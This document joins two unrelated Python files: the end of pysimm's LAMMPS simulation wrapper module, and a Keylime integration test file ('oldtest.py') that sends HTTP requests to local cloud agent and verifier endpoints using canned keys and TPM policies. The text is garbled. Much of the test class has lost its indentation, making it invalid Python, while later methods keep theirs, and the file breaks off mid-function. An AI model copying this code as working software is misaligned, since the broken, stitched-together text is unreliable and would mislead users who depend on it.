            init: when True (and the simulation is not flagged as custom), an
                Init template is prepended unless one is already in the task list
        Returns:
            None
        """
        self._input = ''
        if self.log:
            self._input += 'log {} append\n\n'.format(self.log)
        # if the user already queued an Init template, do not prepend another
        for task in self.sim:
            if isinstance(task, Init):
                init = False
        if init and not self.custom:
            self.sim.insert(0, Init(forcefield=self.forcefield))
        for template in self.sim:
            self._input += template.write(self)
        # final dump is read back by call_lammps() to update the system
        self._input += 'write_dump all custom pysimm.dump.tmp id q x y z vx vy vz\n'
        self._input += 'quit\n'
    def run(self, np=None, nanohub=None, save_input=True, prefix='mpiexec'):
        """pysimm.lmps.Simulation.run
        Begin LAMMPS simulation.
        Args:
            np: number of threads to use (serial by default) default=None
            nanohub: dictionary containing nanohub resource information default=None
            save_input: True to save input as pysimm.sim.in; a string is treated as the filename to save to
            prefix: prefix for running LAMMPS (i.e. - mpiexec)
        """
        if isinstance(save_input, str):
            with open(save_input, 'w') as f:
                f.write(self.input)
        elif save_input is True:
            with open('pysimm.sim.in', 'w') as f:
                f.write(self.input)
        try:
            call_lammps(self, np, nanohub, prefix=prefix)
        except OSError:
            raise PysimmError('There was a problem calling LAMMPS with {}'.format(prefix))
        except IOError:
            if check_lmps_exec():
                raise PysimmError('There was a problem running LAMMPS. The process started but did not finish successfully. Check the log file, or rerun the simulation with debug=True to debug issue from LAMMPS output')
            else:
                raise PysimmError('There was a problem running LAMMPS. LAMMPS is not configured properly. Make sure the LAMMPS_EXEC environment variable is set to the correct LAMMPS executable path. The current path is set to:\n\n{}'.format(LAMMPS_EXEC))
def enqueue_output(out, queue):
    """pysimm.lmps.enqueue_output
    Helps queue output for printing to screen during simulation.
    Reads *out* line by line until EOF, pushing each raw line onto *queue*,
    then closes the stream. Intended to run in a background thread.
    """
    while True:
        line = out.readline()
        if line == b'':
            # empty bytes means EOF on a binary pipe
            break
        queue.put(line)
    out.close()
def call_lammps(simulation, np, nanohub, prefix='mpiexec'):
    """pysimm.lmps.call_lammps
    Wrapper to call LAMMPS using executable name defined in pysimm.lmps module.
    Args:
        simulation: :class:`~pysimm.lmps.Simulation` object reference
        np: number of threads to use
        nanohub: dictionary containing nanohub resource information default=None
        prefix: prefix for running LAMMPS (i.e. - mpiexec)
    Returns:
        None
    Raises:
        PysimmError: when the final dump file was not produced (the run failed)
    """
    if nanohub:
        with open('temp.in', 'w') as f:
            f.write(simulation.input)
        if simulation.name:
            print('%s: sending %s simulation to computer cluster at nanoHUB' % (strftime('%H:%M:%S'), simulation.name))
        else:
            print('%s: sending simulation to computer cluster at nanoHUB' % strftime('%H:%M:%S'))
        sys.stdout.flush()
        cmd = ('submit -n %s -w %s -i temp.lmps -i temp.in '
               'lammps-09Dec14-parallel -e both -l none -i temp.in'
               % (nanohub.get('cores'), nanohub.get('walltime')))
        cmd = shlex.split(cmd)
        exit_status, stdo, stde = RapptureExec(cmd)
    else:
        if simulation.name:
            print('%s: starting %s LAMMPS simulation'
                  % (strftime('%H:%M:%S'), simulation.name))
        else:
            print('%s: starting LAMMPS simulation'
                  % strftime('%H:%M:%S'))
        if np:
            p = Popen([prefix, '-np', str(np),
                       LAMMPS_EXEC, '-e', 'both'],
                      stdin=PIPE, stdout=PIPE, stderr=PIPE)
        else:
            p = Popen([LAMMPS_EXEC, '-e', 'both'],
                      stdin=PIPE, stdout=PIPE, stderr=PIPE)
        simulation.write_input()
        if simulation.debug:
            print(simulation.input)
            warning_print('debug setting involves streaming output from LAMMPS process and can degrade performance')
            warning_print('only use debug for debugging purposes, use print_to_screen to collect stdout after process finishes')
            # the pipe is binary in Python 3: encode the input, and close stdin
            # so the (buffered) data is flushed and LAMMPS sees EOF
            p.stdin.write(simulation.input.encode('utf-8'))
            p.stdin.close()
            q = Queue()
            t = Thread(target=enqueue_output, args=(p.stdout, q))
            t.daemon = True
            t.start()
            # is_alive(): Thread.isAlive() was removed in Python 3.9
            while t.is_alive() or not q.empty():
                try:
                    line = q.get_nowait()
                except Empty:
                    pass
                else:
                    # lines from the binary pipe are bytes; decode before echoing
                    sys.stdout.write(line.decode('utf-8', errors='replace'))
                    sys.stdout.flush()
        else:
            stdo, stde = p.communicate(simulation.input.encode('utf-8'))
            if simulation.print_to_screen:
                print(stdo)
                print(stde)
    # pick up final coordinates/velocities written by the input's write_dump
    simulation.system.read_lammps_dump('pysimm.dump.tmp')
    try:
        os.remove('temp.lmps')
    except OSError as e:
        # best-effort cleanup; the file may not exist for every run type
        print(str(e))
    if os.path.isfile('pysimm.qeq.tmp'):
        os.remove('pysimm.qeq.tmp')
    try:
        os.remove('pysimm.dump.tmp')
        if simulation.name:
            print('%s: %s simulation using LAMMPS successful'
                  % (strftime('%H:%M:%S'), simulation.name))
        else:
            print('%s: simulation using LAMMPS successful'
                  % (strftime('%H:%M:%S')))
    except OSError as e:
        # a missing dump file means LAMMPS never reached the final write_dump
        if simulation.name:
            raise PysimmError('%s simulation using LAMMPS UNsuccessful' % simulation.name)
        else:
            raise PysimmError('simulation using LAMMPS UNsuccessful')
def qeq(s, np=None, nanohub=None, **kwargs):
    """pysimm.lmps.qeq
    Convenience function to call a qeq calculation. kwargs are passed to :class:`~pysimm.lmps.Qeq` constructor
    Args:
        s: system to perform simulation on
        np: number of threads to use
        nanohub: dictionary containing nanohub resource information default=None
    Returns:
        None
    """
    # build a one-task simulation holding only the charge-equilibration step
    simulation = Simulation(s, **kwargs)
    simulation.add_qeq(**kwargs)
    simulation.run(np, nanohub)
def quick_md(s, np=None, nanohub=None, **kwargs):
    """pysimm.lmps.quick_md
    Convenience function to call an individual MD simulation. kwargs are passed to MD constructor
    Args:
        s: system to perform simulation on
        np: number of threads to use
        nanohub: dictionary containing nanohub resource information default=None
    Returns:
        None
    """
    # build a one-task simulation holding only the molecular dynamics step
    simulation = Simulation(s, **kwargs)
    simulation.add_md(**kwargs)
    simulation.run(np, nanohub)
def quick_min(s, np=None, nanohub=None, **kwargs):
    """pysimm.lmps.quick_min
    Convenience function to call an individual energy minimization simulation. kwargs are passed to min constructor
    Args:
        s: system to perform simulation on
        np: number of threads to use
        nanohub: dictionary containing nanohub resource information default=None
    Returns:
        None
    """
    # build a one-task simulation holding only the minimization step
    simulation = Simulation(s, **kwargs)
    simulation.add_min(**kwargs)
    simulation.run(np, nanohub)
def energy(s, all=False, np=None, **kwargs):
    """pysimm.lmps.energy
    Convenience function to calculate energy of a given :class:`~pysimm.system.System` object.
    Args:
        s: system to calculate energy
        all: returns decomposition of energy if True (default: False)
        np: number of threads to use for simulation
    Returns:
        total energy or dictionary of energy components
    """
    sim = Simulation(s, log='pysimm_calc.tmp.log', **kwargs)
    sim.add(OutputSettings(thermo={
        'freq': 1,
        'style': 'custom step etotal epair emol evdwl ecoul ebond eangle edihed eimp'
    }))
    # a zero-length MD run evaluates energies without moving atoms
    sim.add_md(length=0, **kwargs)
    sim.run(np)
    log = LogFile('pysimm_calc.tmp.log')
    try:
        os.remove('pysimm_calc.tmp.log')
    except OSError:
        # narrowed from a bare except: a missing log file is the expected
        # failure mode when the simulation did not run
        error_print('error likely occurred during simulation')
    if all:
        return log.data.loc[0]
    else:
        return log.data.loc[0].TotEng
def check_lmps_attr(s):
    """Synchronize the LAMMPS style properties of system *s* with its force field.
    Copies every style property listed in FF_SETTINGS onto *s* when its
    forcefield is recognized; otherwise emits a warning and leaves *s* unchanged.
    """
    # sync of the forcefield-style properties
    if hasattr(s, 'forcefield'):
        # the 'dreiding' entry defines the canonical set of style property names
        style_props = FF_SETTINGS['dreiding'].keys()
        if s.forcefield in FF_SETTINGS.keys():
            for prop_name in style_props:
                setattr(s, prop_name, FF_SETTINGS[s.forcefield][prop_name])
        else:
            warning_print('Cannot synchronize given forcefield with LAMMPS representation types. '
                          'The forcefield is not present in the FF_SETTINGS of the pysimm.lmps module')
    else:
        warning_print('The forcefield attribute of the system is not defined. Some i/o methods of lmps '
                      'module will not be acessible')
class LogFile(object):
    """pysimm.lmps.LogFile
    Class to read LAMMPS log file into Pandas DataFrame stored in LogFile.data
    Attributes:
        fname: filename of log file
        data: resulting DataFrame with log file data, indexed by Step
    """
    def __init__(self, fname):
        if not pd:
            raise PysimmError('pysimm.lmps.LogFile function requires pandas')
        self.filename = fname
        self.data = pd.DataFrame()
        self._read(self.filename)
    def _read(self, fname):
        """Parse thermo sections of a LAMMPS log.
        Each section starts at a line beginning with 'Step' (column names) and
        ends at a line beginning with 'Loop'; the rows in between are appended
        to self.data.
        """
        with open(fname) as fr:
            in_section = False
            names = []
            strio = None
            for line in fr:
                if line.startswith('Step'):
                    strio = StringIO()
                    in_section = True
                    names = line.strip().split()
                elif line.startswith('Loop'):
                    in_section = False
                    strio.seek(0)
                    # DataFrame.append was removed in pandas 2.0; use pd.concat.
                    # raw string for the regex separator avoids the invalid
                    # escape-sequence warning from '\s+'
                    section = pd.read_csv(strio, sep=r'\s+', names=names, index_col='Step')
                    self.data = pd.concat([self.data, section])
                elif in_section:
                    strio.write(line)
|
oldtest.py | '''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import unittest
import threading
import tornado_requests
import os
import json
import base64
import configparser
import common
import crypto
import tempfile
import signal
import subprocess
import queue
import uuid
import time
import tenant
from distutils.dir_util import copy_tree
import shutil
# --- module-level test fixtures and configuration ---------------------------
# handles for the server processes launched/killed around individual tests
sentinel=None
cv_process = None
cn_process = None
cn_process_list = []
# NOTE(review): this rebinds the name 'queue' from the imported module to an
# instance, so the queue module itself is unreachable below this line
queue = queue.Queue()
num_threads = 5
# read all test endpoints/credentials from the shared keylime config file
config = configparser.RawConfigParser()
config.read(common.CONFIG_FILE)
cloudverifier_port = config.get('general', 'cloudverifier_port')
cloudagent_port = config.get('general', 'cloudagent_port')
registrar_port = config.get('general', 'registrar_port')
cloudagent_ip = config.get('tenant', 'cloudagent_ip')
cloudverifier_ip = config.get('tenant', 'cloudverifier_ip')
# NOTE(review): registrar_ip is read from the 'cloudverifier_ip' option —
# possibly intentional (co-located services), but confirm it should not be
# a separate 'registrar_ip' option
registrar_ip = config.get('tenant', 'cloudverifier_ip')
tpm_policy = json.loads(config.get('tenant', 'tpm_policy'))
my_cert = config.get('tenant', 'my_cert')
ca_cert = config.get('tenant', 'ca_cert')
private_key = config.get('tenant', 'private_key')
test_num_cloudagents = config.getint('general','test_num_cloudagents')
test_duration = config.getint('general','test_duration')
# cv_persistence_filename = config.get('cloud_verifier', 'persistence_filename')
# en_persistence_filename = config.get('registrar', 'persistence_filename')
cv_persistence_filename = None
en_persistence_filename = None
# content keys populated from content_keys.txt by readKUV()
K = None
U = None
V = None
def readKUV():
    """Load the K, U and V content keys from 'content_keys.txt'.
    The file is expected to hold three base64-encoded lines (K, U, V in that
    order); the decoded bytes are stored in the module-level globals.
    """
    global K, U, V
    # read the keys in; the context manager guarantees the file is closed
    # even if a readline/decode fails (the original leaked the handle)
    with open('content_keys.txt', 'r') as f:
        K = base64.b64decode(f.readline())
        U = base64.b64decode(f.readline())
        V = base64.b64decode(f.readline())
def text_callback(request, context):
    """Test helper callback: marks the supplied context with HTTP status 402
    and returns an empty JSON object body. *request* is accepted but unused."""
    context.status_code = 402
    return '{}'
class Test(unittest.TestCase):
cloudverifier_process = None
@classmethod
def setUpClass(cls):
cls.test_table = {
"test_cloudagent_tenant_get_nonce" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_nonce",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_request_path": "/v1/quotes/tenant",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_cloudagent_tenant_get_nonce"},
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudagent_tenant_get_quote" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_quote",
"http_request_verb":"POST",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_body": '{"encrypt_check": "K+oD4GfBMAdOFy94ZxTU2hB77tySSB75VVz2Zo4jN02txhNK2KiO5JhE1SRIUVASMZMW/VQUS9WgWdCUaJ+LOTWSuQ13alG4P4cLoamBr9c=","encrypted_key":"rBWIxK4i6zTl/M69Yyh2hmX+itDR9QCx4CIqmuRrEN3JAIUc2M+balr8gPD9r3Bs0OxYRC8/kcxBNo9Bsm93WZKwlmbZt2uVxhfaAqXwdGVpMBnM3bQnAEj1LIFoZZyQ48PVIdrEO4WW73Z2X3fplEFgOC3YT3lzluYgrn8iBkMRm+o2pJMdhynh6xLguszLX7qDOccPIIJch14ftWlsy6Ya9a6LHr9+hIfs4p2ATVVSl1wtUbf/ouNJdqUPAiFc4oXsg+kHQzWWiipjsAm871cA4wlvUb+/D4mFz1p3PRAK9hcICGwKoanWh8jbeuYnoqkch2EoHeLqayrisfNogg=="}',
"http_result_status_expected": 200,
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudverifier_tenant_provide_v" : {
#"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudverifier_tenant_provide_v",
#"pre_function" : {"name":"do_mock_for_test_cloudverifier_tenant_provide_v", "argument": None},
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
#"concurrent_instances" : 10,
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
},
"test_concurrent_access" : {
"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_concurrent_access",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"concurrency" : {"instances": 5, "new_thread_function":"new_thread"},
"test_iterations" : 100,
},
],
"state_validation_functions": [
{
"function_name": "test_agent_id_list",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
#"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_and_delete_all_entries", "argument": 500}
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_concurrent_cloudnodiness" : {
#"prerun_function" : {"name":"launch_cloudagents", "args": {'starting_port':9000, 'num_cloudagent_instances':250}},
"prerun_function" : {"name":"launch_cloudagents", "args": {'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents}},
"state_change_functions": [
{
"pre_function" : {"name":"test_concurrent_cloudnodiness_modify_request", "argument": 500},
"function_name": "test_concurrent_cloudnodiness",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C00000","cloudagent_ip":"cloudagent_ip.txt","cloudagent_port":"cloudagent_port.txt","tpm_policy": {"22":"ffffffffffffffffffffffffffffffffffffffff","16":"0000000000000000000000000000000000000000"} }',
"http_result_status_expected": 200,
"test_iterations" : test_num_cloudagents,
"post_function" : {"name":"test_concurrent_cloudnodiness_reset_request", "args": {"ip_file": "cloudagent_ip.txt","port_file":"cloudagent_port.txt"} },
},
],
"postrun_function" : {"name":"kill_cloudagents_after_delay", "args": {'sleep': test_duration, 'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents} },
},
"test_full_integration_happy_path" : {
#"prerun_function" : {"name":"launch_required_servers", "argument": None},
"state_change_functions": [
{
"function_name": "do_cloudagent_part",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_result_status_expected": 200,
"check_function" : {"name":"provide_e"},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
{
"function_name": "do_cloudverifier_part",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "XrNfEiODfu1fdXGtWbA+Wk02UhBxx1jTq7zhbC54ROA=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C866E9","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_sleep", "argument": 5},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
#"postrun_function" : {"name":"kill_required_servers", "argument": None},
},
"test_persistance_file_load" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{"06480EC4-6BF3-4F00-8323-FE6AE5868297": {"tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}, "ip": "127.0.0.1", "port": "8882", "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU="}}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_load",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_load", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_write" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_write",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_write", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_bad" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{'},
},
"test_persistance_file_empty" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": ''},
"state_change_functions": [
{
"function_name": "test_persistance_file_empty",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_nonexistent" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": None},
"state_change_functions": [
{
"function_name": "test_persistance_file_nonexistent",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
}
def test_concurrent_cloudnodiness(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_nonce(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_quote(self):
self.execute_test_definition()
def test_cloudverifier_tenant_provide_v(self):
self.execute_test_definition()
def test_concurrent_access(self):
self.execute_test_definition()
def test_full_integration_happy_path(self):
self.execute_test_definition()
def test_persistance_file_load(self):
self.execute_test_definition()
def test_persistance_file_write(self):
self.execute_test_definition()
def test_persistance_file_bad(self):
self.execute_test_definition()
def test_persistance_file_empty(self):
self.execute_test_definition()
def test_persistance_file_nonexistent(self):
self.execute_test_definition()
def test_cloudagent_cloud_verifier_get_quote(self):
pass
def check_test_sleep(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
time.sleep(argument)
#'{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
def read_line_in_file(self, infile, line_number):
with open(infile) as fp:
for i, line in enumerate(fp):
if i == line_number:
return line
def sleep_for_a_while(self, argument):
time.sleep(float(argument))
def test_concurrent_cloudnodiness_modify_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
tmpp_policy = json_request_body['tpm_policy']
mask = 0
for key in list(tmpp_policy.keys()):
if key.isdigit() :
mask = mask + (1<<int(key))
mask_str = "0x%X"%(mask)
tmpp_policy['mask'] = mask_str
json_request_body['tpm_policy'] = tmpp_policy
cloudagent_ip = json_request_body['cloudagent_ip']
if cloudagent_ip.endswith('.txt'):
cloudagent_ip_file = cloudagent_ip
cloudagent_ip_read_from_file = self.read_line_in_file(cloudagent_ip_file, test_iteration)
json_request_body['cloudagent_ip'] = cloudagent_ip_read_from_file.strip()
cloudagent_port = json_request_body['cloudagent_port']
if cloudagent_port.endswith('.txt'):
cloudagent_port_file = cloudagent_port
cloudagent_port_read_from_file = self.read_line_in_file(cloudagent_port_file, test_iteration)
json_request_body['cloudagent_port'] = cloudagent_port_read_from_file.strip()
# parser = ConfigParser.RawConfigParser()
# parser.read(common.CONFIG_FILE)
# test_agent_uuid = parser.get('general', 'agent_uuid')
test_agent_uuid = json_request_body['agent_id']
port_string_length = len(str(json_request_body['cloudagent_port']))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(json_request_body['cloudagent_port'])
json_request_body['agent_id'] = contrived_uuid
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_concurrent_cloudnodiness_reset_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
#time.sleep(2)
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
#reset the request body to file arguments for next iteration
json_request_body['cloudagent_ip'] = argument["ip_file"]
json_request_body['cloudagent_port'] = argument["port_file"]
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_check_persistance_file_empty(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
try:
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 0:
self.fail("Expected empty persistence file to replace non existent persistence file on startup.")
except Exception as e:
self.fail("Problem reading persistence file after replacement of empty persistence file. Error: %s"%e)
def check_test_persistance_file_write(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
try:
with open(cv_persistence_filename, "r") as persistance_file:
file_contents = persistance_file.read()
json_content = json.loads(file_contents)
if len(json_content) != 1 or json_content.get(uuid_str) is None:
self.fail("Unexpected persistence file contents.")
except Exception as e:
self.fail("Problem reading persistence file after POST. Error: %s"%e)
try:
with open(cv_persistence_filename + ".bak", "r") as backup_persistance_file:
backup_file_contents = backup_persistance_file.read()
json_backup_content = json.loads(backup_file_contents)
if len(json_backup_content) != 0:
self.fail("Unexpected backup persistence file contents.")
except Exception as e:
self.fail("Problem reading backup persistence file after POST. Error: %s"%e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 1 or jsondecoded.get(uuid_str) is None :
self.fail("Expected " + uuid_str + " to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Validate the recorded TPM quote and, on success, deliver the encrypted U share.

    Reads the stored HTTP response for *test_function_name*, checks it carries
    both "pubkey" and "quote", verifies the quote through a Tenant instance,
    then POSTs base64(RSA-encrypt(U)) plus an HMAC check value back to the
    cloud agent.  Fails the test on any inconsistency.
    """
    test_record = self.test_table.get(test_method_name)
    # perform each of the test functions and store the results
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            response_body = test_functions.get("http_result_body_actual")
            jsondecoded = json.loads(response_body)
            public_key = jsondecoded.get("pubkey")
            quote = jsondecoded.get("quote")
            # test to make sure these two keys (and values) are in the return
            if public_key == None or quote == None:
                self.fail("Expected both pubkey and quote arguments." )
            else:
                mytenant = tenant.Tenant()
                # command line options can overwrite config values
                mytenant.cloudagent_ip = cloudagent_ip
                mytenant.cloudverifier_ip = cloudverifier_ip
                # Hard-coded uuid matches the canned test table data.
                mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
                if mytenant.validate_tpm_quote(public_key, quote):
                    # encrypt U with the public key
                    global U, K
                    encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key),str(U))
                    encrypt_check = crypto.do_hmac(K,mytenant.agent_uuid)
                    b64_encrypted_u = base64.b64encode(encrypted_U)
                    data = {
                        'encrypted_key': b64_encrypted_u,
                        'encrypt_check': encrypt_check
                    }
                    u_json_message = json.dumps(data)
                    # post encrypted U back to Cloud Agent
                    response = tornado_requests.request("POST", "http://%s:%s/v1/quotes/tenant"%(cloudagent_ip,cloudagent_port),data=u_json_message)
                    if response.status_code != 200:
                        self.fail("Posting of Encrypted U to the Cloud Agent failed with response code %d" %response.status_code )
                else:
                    self.fail("TPM Quote from cloud agent is invalid for nonce: %s"%self.nonce )
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Assert that the recorded agent response carries both a pubkey and a quote."""
    record = self.test_table.get(test_method_name)
    for entry in record[state_change_or_validation]:
        if entry.get("function_name") != test_function_name:
            continue
        decoded = json.loads(entry.get("http_result_body_actual"))
